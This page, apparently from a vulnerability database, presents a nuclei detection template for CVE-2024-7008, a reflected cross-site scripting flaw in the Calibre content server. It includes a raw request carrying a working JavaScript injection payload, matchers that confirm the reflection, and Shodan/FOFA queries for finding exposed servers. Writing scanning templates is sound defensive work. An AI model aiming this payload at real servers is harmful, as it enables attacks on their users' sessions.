Lucene search
K

Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 67 Views

Possible to execute arbitrary JavaScript through a crafted URL on Calibre <= 7.15.0, with potential impact on logged-in users' activities

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-7008
6 Aug 202407:28
circl
CVE
CVE-2024-7008
6 Aug 202403:40
cve
Cvelist
CVE-2024-7008 Calibre Reflected Cross-Site Scripting (XSS)
6 Aug 202403:40
cvelist
Debian CVE
CVE-2024-7008
6 Aug 202403:40
debiancve
EUVD
EUVD-2024-48029
3 Oct 202520:07
euvd
Fedora
[SECURITY] Fedora 40 Update: calibre-7.17.0-3.fc40
27 Aug 202417:09
fedora
Tenable Nessus
Fedora 40 : calibre (2024-a455bea9ca)
27 Aug 202400:00
nessus
Tenable Nessus
GLSA-202409-04 : calibre: Multiple Vulnerabilities
22 Sep 202400:00
nessus
Tenable Nessus
Linux Distros Unpatched Vulnerability : CVE-2024-7008
30 Aug 202500:00
nessus
Gentoo Linux
calibre: Multiple Vulnerabilities
22 Sep 202400:00
gentoo
Rows per page
id: CVE-2024-7008

info:
  name: Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)
  author: DhiyaneshDK
  severity: medium
  description: |
    It is possible to inject arbitrary JavaScript code into the /browse endpoint of the Calibre content server, allowing an attacker to craft a URL that when clicked by a victim, will execute the attacker’s JavaScript code in the context of the victim’s browser. If the Calibre server is running with authentication enabled and the victim is logged in at the time, this can be used to cause the victim to perform actions on the Calibre server on behalf of the attacker.
  impact: |
    Attackers can craft malicious URLs that execute arbitrary JavaScript in victims' browsers, potentially performing unauthorized actions if authentication is enabled and the victim is logged in to the Calibre server.
  remediation: |
    Update Calibre to a version later than 7.15.0 to address the reflected XSS vulnerability.
  reference:
    - https://starlabs.sg/advisories/24/24-7008/
  classification:
    epss-score: 0.2406
    epss-percentile: 0.97567
  metadata:
    verified: true
    shodan-query: html:"Calibre"
    fofa-query: "Server: calibre"
    max-request: 1
  tags: cve,cve2024,calibre,xss,vuln

http:
  - raw:
      - |
        GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - 'window.location.href = "/#book_id=TEST";window.stop();alert(document.domain);//&panel=book_details'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a95f8c547dce8a6dd0593f9871a3dbf04adebeab75b14e885d260c0da30ca8f8022100d15e0dc99646bb261b0de644f0f4f4d119c4b69fcb97899b39ea33e4782a6f98:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.4 - 6.1
EPSS0.2406
SSVC
67